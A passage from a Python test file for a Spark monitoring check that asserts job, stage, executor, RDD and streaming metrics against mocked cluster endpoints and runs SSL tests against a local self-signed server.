'spark_url': SSL_SERVER_URL,
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode',
'executor_level_metrics': True,
}
SSL_NO_VERIFY_CONFIG = {
'spark_url': SSL_SERVER_URL,
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode',
'executor_level_metrics': True,
'ssl_verify': False,
}
SSL_CERT_CONFIG = {
'spark_url': SSL_SERVER_URL,
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode',
'ssl_verify': os.path.join(CERTIFICATE_DIR, 'cert.cert'),
'executor_level_metrics': True,
}
SPARK_JOB_RUNNING_METRIC_VALUES = {
'spark.job.count': 2,
'spark.job.num_tasks': 20,
'spark.job.num_active_tasks': 30,
'spark.job.num_completed_tasks': 40,
'spark.job.num_skipped_tasks': 50,
'spark.job.num_failed_tasks': 60,
'spark.job.num_active_stages': 70,
'spark.job.num_completed_stages': 80,
'spark.job.num_skipped_stages': 90,
'spark.job.num_failed_stages': 100,
}
SPARK_JOB_RUNNING_METRIC_TAGS = [
'status:running',
'job_id:0',
'stage_id:0',
'stage_id:1',
] + COMMON_TAGS
SPARK_JOB_SUCCEEDED_METRIC_VALUES = {
'spark.job.count': 3,
'spark.job.num_tasks': 1000,
'spark.job.num_active_tasks': 2000,
'spark.job.num_completed_tasks': 3000,
'spark.job.num_skipped_tasks': 4000,
'spark.job.num_failed_tasks': 5000,
'spark.job.num_active_stages': 6000,
'spark.job.num_completed_stages': 7000,
'spark.job.num_skipped_stages': 8000,
'spark.job.num_failed_stages': 9000,
}
SPARK_JOB_SUCCEEDED_METRIC_TAGS = [
'status:succeeded',
'job_id:0',
'stage_id:0',
'stage_id:1',
] + COMMON_TAGS
SPARK_STAGE_RUNNING_METRIC_VALUES = {
'spark.stage.count': 3,
'spark.stage.num_active_tasks': 3 * 3,
'spark.stage.num_complete_tasks': 4 * 3,
'spark.stage.num_failed_tasks': 5 * 3,
'spark.stage.executor_run_time': 6 * 3,
'spark.stage.input_bytes': 7 * 3,
'spark.stage.input_records': 8 * 3,
'spark.stage.output_bytes': 9 * 3,
'spark.stage.output_records': 10 * 3,
'spark.stage.shuffle_read_bytes': 11 * 3,
'spark.stage.shuffle_read_records': 12 * 3,
'spark.stage.shuffle_write_bytes': 13 * 3,
'spark.stage.shuffle_write_records': 14 * 3,
'spark.stage.memory_bytes_spilled': 15 * 3,
'spark.stage.disk_bytes_spilled': 16 * 3,
}
SPARK_STAGE_RUNNING_METRIC_TAGS = [
'status:running',
'stage_id:1',
] + COMMON_TAGS
SPARK_STAGE_COMPLETE_METRIC_VALUES = {
'spark.stage.count': 2,
'spark.stage.num_active_tasks': 100 * 2,
'spark.stage.num_complete_tasks': 101 * 2,
'spark.stage.num_failed_tasks': 102 * 2,
'spark.stage.executor_run_time': 103 * 2,
'spark.stage.input_bytes': 104 * 2,
'spark.stage.input_records': 105 * 2,
'spark.stage.output_bytes': 106 * 2,
'spark.stage.output_records': 107 * 2,
'spark.stage.shuffle_read_bytes': 108 * 2,
'spark.stage.shuffle_read_records': 109 * 2,
'spark.stage.shuffle_write_bytes': 110 * 2,
'spark.stage.shuffle_write_records': 111 * 2,
'spark.stage.memory_bytes_spilled': 112 * 2,
'spark.stage.disk_bytes_spilled': 113 * 2,
}
SPARK_STAGE_COMPLETE_METRIC_TAGS = [
'status:complete',
'stage_id:0',
] + COMMON_TAGS
SPARK_DRIVER_METRIC_VALUES = {
'spark.driver.rdd_blocks': 99,
'spark.driver.memory_used': 98,
'spark.driver.disk_used': 97,
'spark.driver.active_tasks': 96,
'spark.driver.failed_tasks': 95,
'spark.driver.completed_tasks': 94,
'spark.driver.total_tasks': 93,
'spark.driver.total_duration': 92,
'spark.driver.total_input_bytes': 91,
'spark.driver.total_shuffle_read': 90,
'spark.driver.total_shuffle_write': 89,
'spark.driver.max_memory': 278019440,
}
SPARK_EXECUTOR_METRIC_VALUES = {
'spark.executor.count': 2,
'spark.executor.rdd_blocks': 1,
'spark.executor.memory_used': 2,
'spark.executor.disk_used': 3,
'spark.executor.active_tasks': 4,
'spark.executor.failed_tasks': 5,
'spark.executor.completed_tasks': 6,
'spark.executor.total_tasks': 7,
'spark.executor.total_duration': 8,
'spark.executor.total_input_bytes': 9,
'spark.executor.total_shuffle_read': 10,
'spark.executor.total_shuffle_write': 11,
'spark.executor.max_memory': 555755765,
}
SPARK_EXECUTOR_LEVEL_METRIC_VALUES = {
'spark.executor.id.rdd_blocks': 1,
'spark.executor.id.memory_used': 2,
'spark.executor.id.disk_used': 3,
'spark.executor.id.active_tasks': 4,
'spark.executor.id.failed_tasks': 5,
'spark.executor.id.completed_tasks': 6,
'spark.executor.id.total_tasks': 7,
'spark.executor.id.total_duration': 8,
'spark.executor.id.total_input_bytes': 9,
'spark.executor.id.total_shuffle_read': 10,
'spark.executor.id.total_shuffle_write': 11,
'spark.executor.id.max_memory': 555755765,
}
SPARK_EXECUTOR_LEVEL_METRIC_TAGS = [
'executor_id:1',
] + COMMON_TAGS
SPARK_RDD_METRIC_VALUES = {
'spark.rdd.count': 1,
'spark.rdd.num_partitions': 2,
'spark.rdd.num_cached_partitions': 2,
'spark.rdd.memory_used': 284,
'spark.rdd.disk_used': 0,
}
SPARK_STREAMING_STATISTICS_METRIC_VALUES = {
'spark.streaming.statistics.avg_input_rate': 1.0,
'spark.streaming.statistics.avg_processing_time': 175,
'spark.streaming.statistics.avg_scheduling_delay': 8,
'spark.streaming.statistics.avg_total_delay': 183,
'spark.streaming.statistics.batch_duration': 2000,
'spark.streaming.statistics.num_active_batches': 2,
'spark.streaming.statistics.num_active_receivers': 1,
'spark.streaming.statistics.num_inactive_receivers': 3,
'spark.streaming.statistics.num_processed_records': 7,
'spark.streaming.statistics.num_received_records': 9,
'spark.streaming.statistics.num_receivers': 10,
'spark.streaming.statistics.num_retained_completed_batches': 27,
'spark.streaming.statistics.num_total_completed_batches': 28,
}
SPARK_STRUCTURED_STREAMING_METRIC_VALUES = {
'spark.structured_streaming.input_rate': 12,
'spark.structured_streaming.latency': 12,
'spark.structured_streaming.processing_rate': 12,
'spark.structured_streaming.rows_count': 12,
'spark.structured_streaming.used_bytes': 12,
}
SPARK_STRUCTURED_STREAMING_METRIC_NO_TAGS = {
'spark.structured_streaming.input_rate',
'spark.structured_streaming.latency',
}
@pytest.mark.unit
def test_yarn(aggregator, dd_run_check):
with mock.patch('requests.get', yarn_requests_get_mock):
c = SparkCheck('spark', {}, [YARN_CONFIG])
dd_run_check(c)
# Check the succeeded job metrics
for metric, value in iteritems(SPARK_JOB_SUCCEEDED_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS + CUSTOM_TAGS)
# Check the running stage metrics
for metric, value in iteritems(SPARK_STAGE_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_RUNNING_METRIC_TAGS + CUSTOM_TAGS)
# Check the complete stage metrics
for metric, value in iteritems(SPARK_STAGE_COMPLETE_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_COMPLETE_METRIC_TAGS + CUSTOM_TAGS)
# Check the driver metrics
for metric, value in iteritems(SPARK_DRIVER_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the executor level metrics
for metric, value in iteritems(SPARK_EXECUTOR_LEVEL_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_EXECUTOR_LEVEL_METRIC_TAGS + CUSTOM_TAGS)
# Check the summary executor metrics
for metric, value in iteritems(SPARK_EXECUTOR_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the RDD metrics
for metric, value in iteritems(SPARK_RDD_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the streaming statistics metrics
for metric, value in iteritems(SPARK_STREAMING_STATISTICS_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the structured streaming metrics
for metric, value in iteritems(SPARK_STRUCTURED_STREAMING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
tags = ['url:http://localhost:8088'] + CLUSTER_TAGS + CUSTOM_TAGS
tags.sort()
for sc in aggregator.service_checks(YARN_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
sc.tags.sort()
assert sc.tags == tags
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
sc.tags.sort()
assert sc.tags == tags
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
@pytest.mark.unit
def test_auth_yarn(aggregator, dd_run_check):
with mock.patch('requests.get', yarn_requests_auth_mock):
c = SparkCheck('spark', {}, [YARN_AUTH_CONFIG])
dd_run_check(c)
tags = ['url:http://localhost:8088'] + CUSTOM_TAGS + CLUSTER_TAGS
tags.sort()
for sc in aggregator.service_checks(YARN_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
sc.tags.sort()
assert sc.tags == tags
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
sc.tags.sort()
assert sc.tags == tags
@pytest.mark.unit
def test_mesos(aggregator, dd_run_check):
with mock.patch('requests.get', mesos_requests_get_mock):
c = SparkCheck('spark', {}, [MESOS_CONFIG])
dd_run_check(c)
# Check the running job metrics
for metric, value in iteritems(SPARK_JOB_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_RUNNING_METRIC_TAGS + CUSTOM_TAGS)
# Check the succeeded job metrics
for metric, value in iteritems(SPARK_JOB_SUCCEEDED_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS + CUSTOM_TAGS)
# Check the running stage metrics
for metric, value in iteritems(SPARK_STAGE_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_RUNNING_METRIC_TAGS + CUSTOM_TAGS)
# Check the complete stage metrics
for metric, value in iteritems(SPARK_STAGE_COMPLETE_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_COMPLETE_METRIC_TAGS + CUSTOM_TAGS)
# Check the driver metrics
for metric, value in iteritems(SPARK_DRIVER_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the executor level metrics
for metric, value in iteritems(SPARK_EXECUTOR_LEVEL_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_EXECUTOR_LEVEL_METRIC_TAGS + CUSTOM_TAGS)
# Check the summary executor metrics
for metric, value in iteritems(SPARK_EXECUTOR_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the RDD metrics
for metric, value in iteritems(SPARK_RDD_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the streaming statistics metrics
for metric, value in iteritems(SPARK_STREAMING_STATISTICS_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the structured streaming metrics
for metric, value in iteritems(SPARK_STRUCTURED_STREAMING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the service tests
for sc in aggregator.service_checks(MESOS_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
tags = ['url:http://localhost:5050'] + CLUSTER_TAGS + CUSTOM_TAGS
tags.sort()
sc.tags.sort()
assert sc.tags == tags
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
tags = ['url:http://localhost:4040'] + CLUSTER_TAGS + CUSTOM_TAGS
tags.sort()
sc.tags.sort()
assert sc.tags == tags
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
@pytest.mark.unit
def test_mesos_filter(aggregator, dd_run_check):
with mock.patch('requests.get', mesos_requests_get_mock):
c = SparkCheck('spark', {}, [MESOS_FILTERED_CONFIG])
dd_run_check(c)
for sc in aggregator.service_checks(MESOS_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:5050'] + CLUSTER_TAGS
assert aggregator.metrics_asserted_pct == 100.0
@pytest.mark.unit
def test_driver_unit(aggregator, dd_run_check):
with mock.patch('requests.get', driver_requests_get_mock):
c = SparkCheck('spark', {}, [DRIVER_CONFIG])
dd_run_check(c)
# Check the running job metrics
for metric, value in iteritems(SPARK_JOB_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_RUNNING_METRIC_TAGS + CUSTOM_TAGS)
# Check the succeeded job metrics
for metric, value in iteritems(SPARK_JOB_SUCCEEDED_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS + CUSTOM_TAGS)
# Check the running stage metrics
for metric, value in iteritems(SPARK_STAGE_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_RUNNING_METRIC_TAGS + CUSTOM_TAGS)
# Check the complete stage metrics
for metric, value in iteritems(SPARK_STAGE_COMPLETE_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_COMPLETE_METRIC_TAGS + CUSTOM_TAGS)
# Check the driver metrics
for metric, value in iteritems(SPARK_DRIVER_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the executor level metrics
for metric, value in iteritems(SPARK_EXECUTOR_LEVEL_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_EXECUTOR_LEVEL_METRIC_TAGS + CUSTOM_TAGS)
# Check the summary executor metrics
for metric, value in iteritems(SPARK_EXECUTOR_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the RDD metrics
for metric, value in iteritems(SPARK_RDD_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the streaming statistics metrics
for metric, value in iteritems(SPARK_STREAMING_STATISTICS_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the structured streaming metrics
for metric, value in iteritems(SPARK_STRUCTURED_STREAMING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS + CUSTOM_TAGS)
# Check the service checks
for sc in aggregator.service_checks(SPARK_DRIVER_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
tags = ['url:http://localhost:4040'] + CLUSTER_TAGS + CUSTOM_TAGS
tags.sort()
sc.tags.sort()
assert sc.tags == tags
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
tags = ['url:http://localhost:4040'] + CLUSTER_TAGS + CUSTOM_TAGS
tags.sort()
sc.tags.sort()
assert sc.tags == tags
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
@pytest.mark.unit
def test_standalone_unit(aggregator, dd_run_check):
with mock.patch('requests.get', standalone_requests_get_mock):
c = SparkCheck('spark', {}, [STANDALONE_CONFIG])
dd_run_check(c)
# Check the running job metrics
for metric, value in iteritems(SPARK_JOB_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_RUNNING_METRIC_TAGS)
# Check the succeeded job metrics
for metric, value in iteritems(SPARK_JOB_SUCCEEDED_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS)
# Check the running stage metrics
for metric, value in iteritems(SPARK_STAGE_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_RUNNING_METRIC_TAGS)
# Check the complete stage metrics
for metric, value in iteritems(SPARK_STAGE_COMPLETE_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_COMPLETE_METRIC_TAGS)
# Check the driver metrics
for metric, value in iteritems(SPARK_DRIVER_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the executor level metrics
for metric, value in iteritems(SPARK_EXECUTOR_LEVEL_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_EXECUTOR_LEVEL_METRIC_TAGS)
# Check the executor metrics
for metric, value in iteritems(SPARK_EXECUTOR_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the RDD metrics
for metric, value in iteritems(SPARK_RDD_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the streaming statistics metrics
for metric, value in iteritems(SPARK_STREAMING_STATISTICS_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the structured streaming metrics
for metric, value in iteritems(SPARK_STRUCTURED_STREAMING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the service checks
for sc in aggregator.service_checks(STANDALONE_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:8080'] + CLUSTER_TAGS
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:4040'] + CLUSTER_TAGS
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
@pytest.mark.unit
def test_standalone_unit_with_proxy_warning_page(aggregator, dd_run_check):
c = SparkCheck('spark', {}, [STANDALONE_CONFIG])
with mock.patch('requests.get', proxy_with_warning_page_mock):
dd_run_check(c)
# Check the running job metrics
for metric, value in iteritems(SPARK_JOB_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_RUNNING_METRIC_TAGS)
# Check the succeeded job metrics
for metric, value in iteritems(SPARK_JOB_SUCCEEDED_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS)
# Check the running stage metrics
for metric, value in iteritems(SPARK_STAGE_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_RUNNING_METRIC_TAGS)
# Check the complete stage metrics
for metric, value in iteritems(SPARK_STAGE_COMPLETE_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_COMPLETE_METRIC_TAGS)
# Check the driver metrics
for metric, value in iteritems(SPARK_DRIVER_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the executor level metrics
for metric, value in iteritems(SPARK_EXECUTOR_LEVEL_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_EXECUTOR_LEVEL_METRIC_TAGS)
# Check the summary executor metrics
for metric, value in iteritems(SPARK_EXECUTOR_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the RDD metrics
for metric, value in iteritems(SPARK_RDD_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the streaming statistics metrics
for metric, value in iteritems(SPARK_STREAMING_STATISTICS_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the structured streaming metrics
for metric, value in iteritems(SPARK_STRUCTURED_STREAMING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the service checks
for sc in aggregator.service_checks(STANDALONE_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:8080'] + CLUSTER_TAGS
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:4040'] + CLUSTER_TAGS
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
@pytest.mark.unit
def test_standalone_pre20(aggregator, dd_run_check):
with mock.patch('requests.get', standalone_requests_pre20_get_mock):
c = SparkCheck('spark', {}, [STANDALONE_CONFIG_PRE_20])
dd_run_check(c)
# Check the running job metrics
for metric, value in iteritems(SPARK_JOB_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_RUNNING_METRIC_TAGS)
# Check the succeeded job metrics
for metric, value in iteritems(SPARK_JOB_SUCCEEDED_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS)
# Check the running stage metrics
for metric, value in iteritems(SPARK_STAGE_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_RUNNING_METRIC_TAGS)
# Check the complete stage metrics
for metric, value in iteritems(SPARK_STAGE_COMPLETE_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_COMPLETE_METRIC_TAGS)
# Check the driver metrics
for metric, value in iteritems(SPARK_DRIVER_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the executor level metrics
for metric, value in iteritems(SPARK_EXECUTOR_LEVEL_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_EXECUTOR_LEVEL_METRIC_TAGS)
# Check the summary executor metrics
for metric, value in iteritems(SPARK_EXECUTOR_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the RDD metrics
for metric, value in iteritems(SPARK_RDD_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the streaming statistics metrics
for metric, value in iteritems(SPARK_STREAMING_STATISTICS_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the structured streaming metrics
for metric, value in iteritems(SPARK_STRUCTURED_STREAMING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the service checks
for sc in aggregator.service_checks(STANDALONE_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:8080'] + CLUSTER_TAGS
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:4040'] + CLUSTER_TAGS
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
@pytest.mark.unit
def test_metadata(aggregator, datadog_agent, dd_run_check):
with mock.patch('requests.get', standalone_requests_pre20_get_mock):
c = SparkCheck(CHECK_NAME, {}, [STANDALONE_CONFIG_PRE_20])
c.check_id = "test:123"
dd_run_check(c)
c._collect_version(SPARK_APP_URL, None)
raw_version = "2.4.0"
major, minor, patch = raw_version.split(".")
version_metadata = {
'version.major': major,
'version.minor': minor,
'version.patch': patch,
'version.raw': raw_version,
}
datadog_agent.assert_metadata('test:123', version_metadata)
@pytest.mark.unit
def test_disable_legacy_cluster_tags(aggregator, dd_run_check):
instance = MESOS_FILTERED_CONFIG
instance['disable_legacy_cluster_tag'] = True
with mock.patch('requests.get', mesos_requests_get_mock):
c = SparkCheck('spark', {}, [instance])
dd_run_check(c)
for sc in aggregator.service_checks(MESOS_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
# Only spark_cluster tag is present
assert sc.tags == ['url:http://localhost:5050', 'spark_cluster:{}'.format(CLUSTER_NAME)]
assert aggregator.metrics_asserted_pct == 100.0
@pytest.mark.unit
@pytest.mark.parametrize(
"instance, requests_get_mock, base_tags",
[
(DRIVER_CONFIG, driver_requests_get_mock, COMMON_TAGS + CUSTOM_TAGS),
(YARN_CONFIG, yarn_requests_get_mock, COMMON_TAGS + CUSTOM_TAGS),
(MESOS_CONFIG, mesos_requests_get_mock, COMMON_TAGS + CUSTOM_TAGS),
(STANDALONE_CONFIG, standalone_requests_get_mock, COMMON_TAGS),
(STANDALONE_CONFIG_PRE_20, standalone_requests_pre20_get_mock, COMMON_TAGS),
],
ids=["driver", "yarn", "mesos", "standalone", "standalone_pre_20"],
)
def test_enable_query_name_tag_for_structured_streaming(
aggregator, dd_run_check, instance, requests_get_mock, base_tags
):
instance['enable_query_name_tag'] = True
with mock.patch('requests.get', requests_get_mock):
c = SparkCheck('spark', {}, [instance])
dd_run_check(c)
for metric, value in iteritems(SPARK_STRUCTURED_STREAMING_METRIC_VALUES):
tags = base_tags
if metric not in SPARK_STRUCTURED_STREAMING_METRIC_NO_TAGS:
tags = base_tags + ["query_name:my_named_query"]
aggregator.assert_metric(metric, value=value, tags=tags)
@pytest.mark.unit
def test_do_not_crash_on_version_collection_failure():
running_apps = {'foo': ('bar', 'http://foo.bar/'), 'foo2': ('bar', 'http://foo.bar/')}
rest_requests_to_json = mock.MagicMock(side_effect=[RequestException, []])
c = SparkCheck('spark', {}, [INSTANCE_STANDALONE])
with mock.patch.object(c, '_rest_request_to_json', rest_requests_to_json):
# ensure no exception is raised by calling collect_version
assert not c._collect_version(running_apps, [])
@pytest.mark.unit
def test_ssl(dd_run_check):
run_ssl_server()
c = SparkCheck('spark', {}, [SSL_CONFIG])
with pytest.raises(Exception, match="\\[SSL: CERTIFICATE_VERIFY_FAILED\\] certificate verify failed"):
dd_run_check(c, extract_message=True)
@pytest.mark.unit
def test_ssl_no_verify(dd_run_check):
# Disable ssl warning for self signed cert/no verify
urllib3.disable_warnings()
run_ssl_server()
c = SparkCheck('spark', {}, [SSL_NO_VERIFY_CONFIG])
dd_run_check(c)
@pytest.mark.unit
def test_ssl_cert(dd_run_check):
# Disable ssl warning for self signed cert/no verify
urllib3.disable_warnings()
run_ssl_server()
c = SparkCheck('spark', {}, [SSL_CERT_CONFIG])
dd_run_check(c)
@pytest.mark.unit
def test_do_not_crash_on_single_app_failure():
running_apps = {'foo': ('bar', 'http://foo.bar/'), 'foo2': ('bar', 'http://foo.bar/')}
results = []
rest_requests_to_json = mock.MagicMock(side_effect=[Exception, results])
c = SparkCheck('spark', {}, [INSTANCE_STANDALONE])
with mock.patch.object(c, '_rest_request_to_json', rest_requests_to_json), mock.patch.object(c, '_collect_version'):
c._get_spark_app_ids(running_apps, [])
assert rest_requests_to_json.call_count == 2
class StandaloneAppsResponseHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
with open(os.path.join(FIXTURE_DIR, 'spark_standalone_apps'), 'rb') as f:
self.wfile.write(f.read())
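# run_ssl_server (below) backs the SSL unit tests above: it binds a one-shot
# HTTPServer to (SSL_SERVER_ADDRESS, SSL_SERVER_PORT), wraps its socket with the
# self-signed certificate from CERTIFICATE_DIR, serves exactly one request
# (handle_request) on a background thread, and sleeps briefly so the server is
# listening before the check under test connects.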
def run_ssl_server():
cert_file = os.path.join(CERTIFICATE_DIR, 'server.pem')
httpd = BaseHTTPServer.HTTPServer((SSL_SERVER_ADDRESS, SSL_SERVER_PORT), StandaloneAppsResponseHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=cert_file, server_side=False)
httpd.timeout = 5
threading.Thread(target=httpd.handle_request).start()
time.sleep(0.5)
return httpd
SPARK_DRIVER_CLUSTER_TAGS = ['spark_cluster:{}'.format('SparkDriver'), 'cluster_name:{}'.format('SparkDriver')]
@pytest.mark.integration
@pytest.mark.usefixtures('dd_environment')
def test_integration_standalone(aggregator, dd_run_check):
c = SparkCheck('spark', {}, [INSTANCE_STANDALONE])
dd_run_check(c)
expected_metric_values = (
SPARK_JOB_RUNNING_METRIC_VALUES,
SPARK_STAGE_RUNNING_METRIC_VALUES,
SPARK_DRIVER_METRIC_VALUES,
SPARK_STRUCTURED_STREAMING_METRIC_VALUES,
SPARK_EXECUTOR_METRIC_VALUES,
)
optional_metric_values = (SPARK_STREAMING_STATISTICS_METRIC_VALUES,)
# Extract all keys
expected_metrics = set(k for j in expected_metric_values for k in j)
optional_metrics = set(k for j in optional_metric_values for k in j)
# Check the running job metrics
for metric in expected_metrics:
aggregator.assert_metric(metric)
for metric in optional_metrics:
aggregator.assert_metric(metric, at_least=0)
aggregator.assert_service_check(
'spark.standalone_master.can_connect',
status=SparkCheck.OK,
tags=['url:{}'.format('http://spark-master:8080')] + CLUSTER_TAGS,
)
aggregator.assert_all_metrics_covered()
@pytest.mark.integration
@pytest.mark.usefixtures('dd_environment')
def test_integration_driver_1(aggregator, dd_run_check):
c = SparkCheck('spark', {}, [INSTANCE_DRIVER_1])
dd_run_check(c)
all_metric_values = (
SPARK_JOB_RUNNING_METRIC_VALUES,
SPARK_STAGE_RUNNING_METRIC_VALUES,
SPARK_DRIVER_METRIC_VALUES,
)
optional_metric_values = (
SPARK_STREAMING_STATISTICS_METRIC_VALUES,
SPARK_EXECUTOR_METRIC_VALUES,
)
# Extract all keys
expected_metrics = set(k for j in all_metric_values for k in j)
optional_metrics = set(k for j in optional_metric_values for k in j)
# Check the running job metrics
for metric in expected_metrics:
aggregator.assert_metric(metric)
for metric in optional_metrics:
aggregator.assert_metric(metric, at_least=0)
aggregator.assert_service_check(
'spark.driver.can_connect',
status=SparkCheck.OK,
tags=['url:{}'.format('http://spark-app-1:4040')] + SPARK_DRIVER_CLUSTER_TAGS,
)
aggregator.assert_all_metrics_covered()
@pytest.mark.integration
@pytest.mark.usefixtures('dd_environment')
def test_integration_driver_2(aggregator, dd_run_check):
c = SparkCheck('spark', {}, [INSTANCE_DRIVER_2])
dd_run_check(c)
all_metric_values = (
SPARK_DRIVER_METRIC_VALUES,
SPARK_STRUCTURED_STREAMING_METRIC_VALUES,
)
optional_metric_values = (
